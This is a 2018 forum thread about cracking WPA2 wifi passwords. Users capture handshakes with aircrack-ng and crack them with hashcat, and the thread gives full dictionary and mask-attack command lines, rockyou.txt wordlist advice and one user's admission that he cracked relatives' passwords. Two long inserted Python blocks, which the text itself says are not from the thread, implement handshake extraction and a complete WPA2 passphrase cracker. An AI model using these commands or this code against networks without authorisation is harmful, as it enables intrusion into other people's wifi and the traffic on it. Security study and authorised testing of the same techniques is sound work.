aka Posted June 29, 2018
Hello, we all know the techniques to hack a WPA2 wifi password: brute force using a dictionary, WPS, and social engineering. But could someone with good experience of that cite the 3 best pieces of software that currently work? Thanks
0phoi5 Posted June 29, 2018 (edited)
Loads of experience here. Personally, aircrack-ng and oclHashcat are the way to go. No need for 3; those 2 do it better than anything else I've come across. Aircrack for grabbing the handshake, Hashcat for cracking it using the GPU (the fastest method I've come across).
Edited June 29, 2018 by haze1434
aka Posted July 1, 2018 (Author)
Thanks, I will try. But if I understand your point, once I've got a handshake (with a little laptop) I go to my desktop (more power) and use oclHashcat to decrypt. Correct? Sorry, I'm a little tired of trying everything to crack WPA2.
b0N3z Posted July 1, 2018
14 hours ago, aka said: "Thanks, I will try. But if I understand your point, once I've got a handshake (with a little laptop) I go to my desktop (more power) and use oclHashcat to decrypt. Correct? Sorry, I'm a little tired of trying everything to crack WPA2."
Correct. Get a good password list like rockyou.txt; depending on the GPU in your desktop, it will take more or less time to run through the list. I have a GTX 1050 and it runs through rockyou.txt in about 3 mins. I've also cleaned the handshake to make it as small as possible so it runs quicker.
Dave-ee Jones Posted July 2, 2018
4 hours ago, b0N3z said: "Correct. Get a good password list like rockyou.txt; depending on the GPU in your desktop, it will take more or less time to run through the list. I have a GTX 1050 and it runs through rockyou.txt in about 3 mins. I've also cleaned the handshake to make it as small as possible so it runs quicker."
I wonder how fast my 1080 Ti could do it... 20 seconds, maybe?
b0N3z Posted July 2, 2018
23 hours ago, Dave-ee Jones said: "I wonder how fast my 1080 Ti could do it... 20 seconds, maybe?"
Maybe. I'm also using Kali as the OS on a cheap SSD, so with a good SSD and a 1080 Ti it would be quite quick.
aka Posted July 3, 2018 (Author)
On 7/2/2018 at 1:39 AM, b0N3z said: "Correct. Get a good password list like rockyou.txt; depending on the GPU in your desktop, it will take more or less time to run through the list. I have a GTX 1050 and it runs through rockyou.txt in about 3 mins. I've also cleaned the handshake to make it as small as possible so it runs quicker."
OK, I will try and let you know. I will install oclHashcat on both my systems, Windows and Kali. But you said you used the rockyou.txt wordlist to decrypt, so I assume that wordlist is very efficient for decrypting WPA2. Thanks
b0N3z Posted July 3, 2018
4 minutes ago, aka said: "OK, I will try and let you know. I will install oclHashcat on both my systems, Windows and Kali. But you said you used the rockyou.txt wordlist to decrypt, so I assume that wordlist is very efficient for decrypting WPA2. Thanks"
Haven't tried the Windows subsystem for hashcat yet, just Kali itself, so I don't quite know how that will work. Yes, rockyou.txt is pretty good if you don't want to make a custom list. I have pulled a couple of my family members' wifi passwords with the rockyou list, mainly to show them how bad their passwords are lol. They had no idea that somebody could even do something like that.
aka Posted July 3, 2018 (Author)
31 minutes ago, b0N3z said: "Haven't tried the Windows subsystem for hashcat yet, just Kali itself, so I don't quite know how that will work. Yes, rockyou.txt is pretty good if you don't want to make a custom list. I have pulled a couple of my family members' wifi passwords with the rockyou list, mainly to show them how bad their passwords are lol. They had no idea that somebody could even do something like that."
Thanks, I will try and let you know.
Dave-ee Jones Posted July 3, 2018
23 hours ago, b0N3z said: "Maybe. I'm also using Kali as the OS on a cheap SSD, so with a good SSD and a 1080 Ti it would be quite quick."
Yeah, I've got one of the Samsung 860 EVOs. Considering an M.2 but can't justify spending another $500 or so just for extra read/write speed.
b0N3z Posted July 3, 2018 (edited)
9 minutes ago, Dave-ee Jones said: "Yeah, I've got one of the Samsung 860 EVOs. Considering an M.2 but can't justify spending another $500 or so just for extra read/write speed."
I'm running an old i7-2600K with 16 GB RAM and an Intel 240 GB with slower read/write (480 maybe). Working on upgrading mobo, CPU, RAM, and power soon.
Edited July 3, 2018 by b0N3z
Exmix Posted July 4, 2018
On 7/1/2018 at 4:09 PM, b0N3z said: "Correct. Get a good password list like rockyou.txt; depending on the GPU in your desktop, it will take more or less time to run through the list. I have a GTX 1050 and it runs through rockyou.txt in about 3 mins. I've also cleaned the handshake to make it as small as possible so it runs quicker."
I have a question about that. I've mostly used aircrack, but as we all know it takes FOREVER. I was working with hashcat for a bit. It was hit and miss; like, I used a dictionary that I know for 100% sure had the password of the handshake in it. Sometimes it would show it, sometimes it wouldn't. Is there any reason behind that? Also, how do you 'clean' the handshake? What exactly does that do? I'm not COMPLETELY into WiFi hacking, but would like to know some basics of it.
b0N3z Posted July 4, 2018
4 hours ago, Exmix said: "I have a question about that. I've mostly used aircrack, but as we all know it takes FOREVER. I was working with hashcat for a bit. It was hit and miss; like, I used a dictionary that I know for 100% sure had the password of the handshake in it. Sometimes it would show it, sometimes it wouldn't. Is there any reason behind that? Also, how do you 'clean' the handshake? What exactly does that do? I'm not COMPLETELY into WiFi hacking, but would like to know some basics of it."
I loaded the pcap into Wireshark and exported the handshake only, then converted the file to hashcat format with an online converter tool. I can't remember the website, as I spent an entire day messing with it and haven't really touched it since. Running the pcap with aircrack was taking 3-4 hrs, and once I set up Kali and hashcat I was running handshakes in 2-3 mins.
0phoi5 Posted July 4, 2018
2 hours ago, b0N3z said: "I can't remember the website, as I spent an entire day messing with it and haven't really touched it since."
https://hashcat.net/cap2hccapx/
b0N3z Posted July 4, 2018 (edited)
2 minutes ago, haze1434 said: "https://hashcat.net/cap2hccapx/"
Yes sir.
Edited July 4, 2018 by b0N3z
0phoi5 Posted July 4, 2018
2 hours ago, b0N3z said: "I loaded the pcap into Wireshark and exported the handshake only"
Could you explain the steps to do this at all? To be honest, I've not really bothered with this in the past. Does it make much of a difference in time to crack? Thank you.
b0N3z Posted July 4, 2018
1 minute ago, haze1434 said: "Could you explain the steps to do this at all? To be honest, I've not really bothered with this in the past. Does it make much of a difference in time to crack? Thank you."
The only reason I exported the individual handshake was because I had multiple handshakes in the same pcap and I wanted to separate each one into its own individual pcap file. I don't know the exact filter I used in Wireshark, but you can google "wireshark filter for wifi handshake" and give it a try. You only need the first 3 packets of the handshake to crack. This will make the file smaller, and I don't really know if it makes much of a difference unless your pcap is huge, as in it took forever to get the handshake and the file is very large. Sorry I can't be more specific; I quit messing with it after I figured it out and for some reason didn't make any notes on the subject. Probably because beer lol
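A scripted version of the "clean the handshake" step b0N3z describes, added here as an example; it is not code from the thread, from Wireshark or from the cap2hccapx converter. It reads a classic pcap, keeps only the target BSSID's beacon/probe-response frames (the cracker needs the SSID from them) and the EAPOL-Key frames of handshake messages 1 to 3, and writes the trimmed pcap back out. Assumptions: the capture uses link type 105 (raw 802.11 frames with no radiotap header; a radiotap capture needs its length field skipped first), the frames are not 4-address WDS frames, and the sample capture, MAC addresses and SSIDs are constructed inside the script.

```python
"""Trim a monitor-mode capture to the frames a WPA2 cracker needs.  Added example, not
code from the thread.  ASSUMPTION: classic little-endian pcap, link type 105 (raw 802.11,
no radiotap).  The sample capture, MACs and SSIDs below are CONSTRUCTED in-script."""
import struct
from typing import Dict, List, Tuple

PCAP_MAGIC, LINKTYPE_IEEE802_11 = 0xA1B2C3D4, 105
LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")   # LLC/SNAP + EtherType 0x888E
# (ack, mic, install, secure) Key Information flags -> 4-way handshake message number
MSG_FLAGS = {(1, 0, 0, 0): 1, (0, 1, 0, 0): 2, (1, 1, 1, 1): 3, (0, 1, 0, 1): 4}


def read_pcap(data: bytes) -> Tuple[int, List[Tuple[int, int, bytes]]]:
    magic, _, _, _, _, _, linktype = struct.unpack("<IHHiIII", data[:24])
    assert magic == PCAP_MAGIC, "not a little-endian classic pcap"
    pkts, off = [], 24
    while off + 16 <= len(data):
        sec, usec, incl, _ = struct.unpack("<IIII", data[off:off + 16])
        pkts.append((sec, usec, data[off + 16:off + 16 + incl]))
        off += 16 + incl
    return linktype, pkts


def write_pcap(linktype: int, pkts: List[Tuple[int, int, bytes]]) -> bytes:
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, linktype)
    for sec, usec, fr in pkts:
        out += struct.pack("<IIII", sec, usec, len(fr), len(fr)) + fr
    return out


def header_len(frame: bytes) -> int:
    n = 30 if frame[1] & 0x03 == 0x03 else 24       # 4-address (WDS) frames carry addr4
    return n + 2 if (frame[0] >> 2) & 0x3 == 2 and frame[0] & 0x80 else n  # QoS data: +2


def frame_bssid(frame: bytes) -> bytes:
    if (frame[0] >> 2) & 0x3 == 2 and frame[1] & 0x01:
        return frame[4:10]      # To-DS data frame: addr1 is the BSSID
    if (frame[0] >> 2) & 0x3 == 2 and frame[1] & 0x02:
        return frame[10:16]     # From-DS data frame: addr2 is the BSSID
    return frame[16:22]         # management frames: addr3 is the BSSID


def ssid_from_mgmt(frame: bytes) -> str:
    """SSID element (tag 0) after the 12 fixed bytes of a beacon / probe response."""
    off = header_len(frame) + 12
    while off + 2 <= len(frame):
        tag, ln = frame[off], frame[off + 1]
        if tag == 0:
            return frame[off + 2:off + 2 + ln].decode("utf-8", "replace")
        off += 2 + ln
    return ""


def eapol_message_number(frame: bytes) -> int:
    """4-way handshake message (1-4) carried by a data frame, or 0 if not EAPOL-Key."""
    h = header_len(frame)
    if len(frame) < h + 15 or frame[h:h + 8] != LLC_SNAP_EAPOL or frame[h + 9] != 3:
        return 0
    info = int.from_bytes(frame[h + 13:h + 15], "big")
    flags = tuple(int(bool(info & bit)) for bit in (0x80, 0x100, 0x40, 0x200))
    return MSG_FLAGS.get(flags, 0)


def trim_capture(pcap: bytes, bssid: bytes, keep=(1, 2, 3)) -> Tuple[bytes, Dict[str, object]]:
    """Keep `bssid`'s beacons/probe responses (SSID) and the handshake messages in `keep`."""
    linktype, pkts = read_pcap(pcap)
    kept, found = [], {}
    for pkt in pkts:
        fr = pkt[2]
        if len(fr) < 24 or frame_bssid(fr) != bssid:
            continue
        ftype = (fr[0] >> 2) & 0x3
        msg = eapol_message_number(fr) if ftype == 2 else 0
        if ftype == 0 and fr[0] >> 4 in (5, 8):          # probe response / beacon
            found["ssid"] = ssid_from_mgmt(fr)
        elif msg in keep:
            found[f"m{msg}"] = True
        else:
            continue
        kept.append(pkt)
    return write_pcap(linktype, kept), found


# --- constructed sample capture: target AP + client, a neighbour AP and some noise ---
AP, STA, OTHER = (bytes.fromhex(h) for h in ("001122334455", "66778899aabb", "ccddeeff0011"))


def _beacon(bssid: bytes, ssid: str) -> bytes:
    hdr = b"\x80\x00\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    return hdr + bytes(8) + b"\x64\x00\x11\x04" + bytes([0, len(ssid)]) + ssid.encode()


def _data(src: bytes, dst: bytes, bssid: bytes, to_ds: bool, payload: bytes) -> bytes:
    a1, a2, a3 = (bssid, src, dst) if to_ds else (dst, bssid, src)
    return (b"\x08\x01" if to_ds else b"\x08\x02") + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + payload


def _eapol_key(key_info: int, nonce: bytes) -> bytes:
    body = b"\x02" + key_info.to_bytes(2, "big") + bytes(10) + nonce + bytes(50)  # 95-byte RSN descriptor
    return LLC_SNAP_EAPOL + b"\x02\x03" + len(body).to_bytes(2, "big") + body


SAMPLE_PCAP = write_pcap(LINKTYPE_IEEE802_11, [
    (1, 0, _beacon(AP, "homewifi")),
    (1, 1, _beacon(OTHER, "neighbour")),                                            # other BSSID: dropped
    (2, 0, _data(AP, STA, AP, False, _eapol_key(0x008A, bytes(range(32))))),        # M1 (ANonce)
    (2, 1, _data(STA, AP, AP, True, _eapol_key(0x010A, bytes(range(32, 64))))),     # M2 (SNonce, MIC)
    (2, 2, _data(AP, STA, AP, False, _eapol_key(0x13CA, bytes(range(32))))),        # M3
    (2, 3, _data(STA, AP, AP, True, _eapol_key(0x030A, bytes(32)))),                # M4: not kept
    (3, 0, _data(STA, AP, AP, True, bytes.fromhex("aaaa030000000800") + bytes(20))),  # IPv4: dropped
])
```

Messages 1 and 2 (ANonce, SNonce and the client's MIC) are what a cracker actually verifies against; message 3 gives a second MIC to check. The trimmed file is not faster to crack, because the cost is one PBKDF2 per candidate and has nothing to do with file size; trimming matters when a capture mixes several networks or several handshakes and you want exactly one per file before converting it.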
0phoi5 Posted July 4, 2018
10 minutes ago, b0N3z said: "Probably because beer lol"
Ha, no worries. I'll have to have another play this weekend.
b0N3z Posted July 4, 2018
My biggest hurdle was figuring out hashcat and converting the pcap to hccapx. Once I had that figured out, it was smooth sailing from there. I'm also going to have to dig into it a bit more and make notes this time lol
aka Posted July 5, 2018 (Author)
On 7/4/2018 at 8:01 PM, b0N3z said: "My biggest hurdle was figuring out hashcat and converting the pcap to hccapx. Once I had that figured out, it was smooth sailing from there. I'm also going to have to dig into it a bit more and make notes this time lol"
Hi, sorry to disturb you, but since you have more experience using hashcat, can you give me at least an average config to decrypt WPA? I'm a little confused with the interface, wordlist, hybrid, brute force etc. I used hashcat v4.1.0 and GUI v1.00rc3.
0phoi5 Posted July 6, 2018 (edited)
13 hours ago, aka said: "Hi, sorry to disturb you, but since you have more experience using hashcat, can you give me at least an average config to decrypt WPA? I'm a little confused with the interface, wordlist, hybrid, brute force etc. I used hashcat v4.1.0 and GUI v1.00rc3."
Most of the time, you'll want to go for a Mask Attack. Using Windows CMD, this would be something like:

oclHashCat.exe -m 2500 HASHES.txt -a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1

oclHashCat.exe (run Hashcat)
-m 2500 (hash type is WPA/WPA2)
HASHES.txt (use HASHES.txt for the hashes to be cracked)
-a 3 (mode Brute-Force)
-1 ?l?d?u (create '1' as meaning lowercase, uppercase and numbers)
?1?1?1?1?1?1?1?1 (set password as 8 characters in length, so 1 repeated 8 times)

The above will (I think, I'd need to double check the syntax) crack a WPA2 password that is up to 8 characters in length and contains uppercase, lowercase and numbers. You should research the default passwords for the router being pentested; the above mask should be amended to match initially. For example, if you knew the password was 5 letters and 4 numbers, you could use:

-1 ?l?u -2 ?d ?1?1?1?1?1?2?2?2?2

Note the above is a brute-force example; you should exhaust your password files first, such as rockyou, via a dictionary attack:

oclHashCat.exe -m 2500 HASHES.txt DICTIONARY.txt

I go in this order:
1. Dictionary attacks, using the smallest/quickest dictionary first and the slowest last
2. Mask attack using likely default password layout
3. Mask attack using incremental lowercase letters, uppercase letters and numbers, up to 12 digits

Anything past this usually takes too long, so if the above fails, I tend to stop there and admit defeat. You can judge this based on your rig.
Edited July 6, 2018 by haze1434
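What those commands make hashcat do for every candidate, written out as an added example (not code from the thread and not hashcat's own): the PBKDF2 step that makes WPA2 slow, the PTK/KCK derivation, the MIC check against the EAPOL frame, and a small implementation of hashcat's mask syntax with -1/-2 custom charsets so the keyspace of a mask like ?1?1?1?1?1?1?1?1 can be seen as a number. The handshake it cracks is constructed in-script from a known passphrase; the SSID, MAC addresses, nonces and the three-word wordlist are made up. Key descriptor version 3 (AES-CMAC, used with SHA-256 AKMs) is left out.

```python
"""What hashcat -m 2500 does per candidate, plus hashcat's mask syntax.  Added example,
not code from the thread or from hashcat.  The handshake is CONSTRUCTED in-script from a
known passphrase; on a real capture you fill WpaHandshake from the EAPOL frames instead."""
import hashlib, hmac, itertools, math, string
from dataclasses import dataclass
from typing import Dict, Iterable, Iterator, List, Optional

# hashcat's built-in charsets ?l ?u ?d ?s ?a
BUILTIN = {"l": string.ascii_lowercase, "u": string.ascii_uppercase,
           "d": string.digits, "s": " " + string.punctuation}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def parse_mask(mask: str, custom: Optional[Dict[str, str]] = None) -> List[str]:
    """Expand a mask such as '?1?1?2?2' into one character set per position.  `custom`
    holds the -1..-4 definitions, e.g. {"1": "?l?d?u"}; '??' is a literal '?' and any
    other character is a literal."""
    custom, sets, i = custom or {}, [], 0
    while i < len(mask):
        if mask[i] != "?":
            sets.append(mask[i])
            i += 1
            continue
        tag = mask[i + 1]
        if tag == "?":
            sets.append("?")
        elif tag in BUILTIN:
            sets.append(BUILTIN[tag])
        elif tag in custom:
            sets.append("".join(parse_mask(custom[tag])))   # -1 ?l?d?u -> 62 characters
        else:
            raise ValueError(f"unknown mask token ?{tag}")
        i += 2
    return sets


def keyspace(mask: str, custom: Optional[Dict[str, str]] = None) -> int:
    """How many candidates the mask expands to (what hashcat --keyspace reports)."""
    return math.prod(len(s) for s in parse_mask(mask, custom))


def mask_candidates(mask: str, custom: Optional[Dict[str, str]] = None) -> Iterator[str]:
    for combo in itertools.product(*parse_mask(mask, custom)):
        yield "".join(combo)


@dataclass
class WpaHandshake:
    ssid: str
    ap_mac: bytes     # BSSID
    sta_mac: bytes    # client
    anonce: bytes     # 32 bytes, from message 1
    snonce: bytes     # 32 bytes, from message 2
    eapol: bytes      # complete EAPOL-Key frame of message 2
    mic: bytes        # the 16-byte MIC carried in that frame


def pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes): the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck(pmk_: bytes, hs: WpaHandshake) -> bytes:
    """KCK = first 16 bytes of PTK = PRF-512(PMK, "Pairwise key expansion", MACs || nonces)."""
    data = (min(hs.ap_mac, hs.sta_mac) + max(hs.ap_mac, hs.sta_mac)
            + min(hs.anonce, hs.snonce) + max(hs.anonce, hs.snonce))
    ptk = b"".join(hmac.new(pmk_, b"Pairwise key expansion\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return ptk[:16]


def eapol_mic(kck_: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field (bytes 81..96) zeroed."""
    version = eapol[6] & 0x07             # low 3 bits of Key Information
    zeroed = eapol[:81] + bytes(16) + eapol[97:]
    if version == 1:                      # WPA / TKIP
        return hmac.new(kck_, zeroed, hashlib.md5).digest()
    if version == 2:                      # WPA2 / CCMP
        return hmac.new(kck_, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("key descriptor version 3 (AES-CMAC) not covered in this example")


def check_passphrase(hs: WpaHandshake, passphrase: str) -> bool:
    if not 8 <= len(passphrase) <= 63:    # WPA-PSK passphrases are 8 to 63 characters
        return False
    return hmac.compare_digest(eapol_mic(kck(pmk(passphrase, hs.ssid), hs), hs.eapol), hs.mic)


def crack(hs: WpaHandshake, candidates: Iterable[str]) -> Optional[str]:
    return next((c for c in candidates if check_passphrase(hs, c)), None)


def build_message2(passphrase, ssid, ap_mac, sta_mac, anonce, snonce) -> WpaHandshake:
    """CONSTRUCTED handshake: a message-2 EAPOL-Key frame signed the way a real client would."""
    body = (b"\x02" + (0x010A).to_bytes(2, "big") + bytes(2) + (1).to_bytes(8, "big")
            + snonce + bytes(16 + 8 + 8 + 16) + bytes(2))   # RSN; ver 2 | pairwise | MIC; no key data
    eapol = b"\x02\x03" + len(body).to_bytes(2, "big") + body
    hs = WpaHandshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, bytes(16))
    hs.mic = eapol_mic(kck(pmk(passphrase, ssid), hs), eapol)
    hs.eapol = eapol[:81] + hs.mic + eapol[97:]
    return hs


SAMPLE = build_message2("Summer2018", "homewifi", bytes.fromhex("001122334455"),
                        bytes.fromhex("66778899aabb"), bytes(range(32)), bytes(range(32, 64)))
```

keyspace("?1?1?1?1?1?1?1?1", {"1": "?l?d?u"}) is 62^8, about 2.2e14 candidates; a single consumer GPU manages a few hundred thousand of these PBKDF2 checks per second, so that mask runs for years, which is why the dictionary-first order above is the right one and why a mask should follow a router's known default pattern (5 letters plus 4 digits is 52^5 * 10^4, about 3.8e12, still large). On hashcat 4.x, -m 2500 takes the hccapx produced by the converter linked above; hashcat 6.x replaces it with -m 22000 and the hc22000 format, but the fields checked are the same ones this script takes directly (MACs, nonces, EAPOL frame, MIC).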
b0N3z Posted July 6, 2018 (edited)
3 hours ago, haze1434 said: "Most of the time, you'll want to go for a Mask Attack. Using Windows CMD, this would be something like: oclHashCat.exe -m 2500 HASHES.txt -a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1 (run Hashcat) (hash type is WPA/WPA2) (use HASHES.txt for the hashes to be cracked) (mode Brute-Force) (create '1' as meaning lowercase, uppercase and numbers) (set password as 8 characters in length, so 1 repeated 8 times). The above will (I think, I'd need to double check the syntax) crack a WPA2 password that is up to 8 characters in length and contains uppercase, lowercase and numbers. You should research the default passwords for the router being pentested; the above mask should be amended to match initially. For example, if you knew the password was 5 letters and 4 numbers, you could use: -1 ?l?u -2 ?d ?1?1?1?1?1?2?2?2?2. Note the above is a brute-force example; you should exhaust your password files first, such as rockyou, via a dictionary attack: oclHashCat.exe -m 2500 HASHES.txt DICTIONARY.txt. I go in this order: 1. Dictionary attacks, using the smallest/quickest dictionary first and the slowest last; 2. Mask attack using likely default password layout; 3. Mask attack using incremental lowercase letters, uppercase letters and numbers, up to 12 digits. Anything past this usually takes too long, so if the above fails, I tend to stop there and admit defeat. You can judge this based on your rig."
You went further than I do. I normally just run a wordlist and call it a day. If I get it, cool; if not, I move on.
Edited July 6, 2018 by b0N3z
aka Posted July 6, 2018 (Author)
THANKS. I tried your combination, but I think my graphics card is not powerful enough for a mask attack, so I tried again using a wordlist that I modified, and it works. So my conclusion is:
1. If you have a good graphics card, a mask attack is better and saves you from thinking too hard about customising a wordlist.
2. With good recon and luck, a wordlist gives you a good crack, but you have to repeat the test.
3. My hashcat interface.
b0N3z Posted July 6, 2018
I run a GTX 1050 and it worked great. It is a budget card I got for around $100-125 ish.
aka Posted July 6, 2018 (Author, edited)
1 hour ago, b0N3z said: "I run a GTX 1050 and it worked great. It is a budget card I got for around $100-125 ish."
For a mask attack?? I have to change my graphics card; I have a GTX 660 2 GB, so I plan to get a GTX 1050.
Edited July 6, 2018 by aka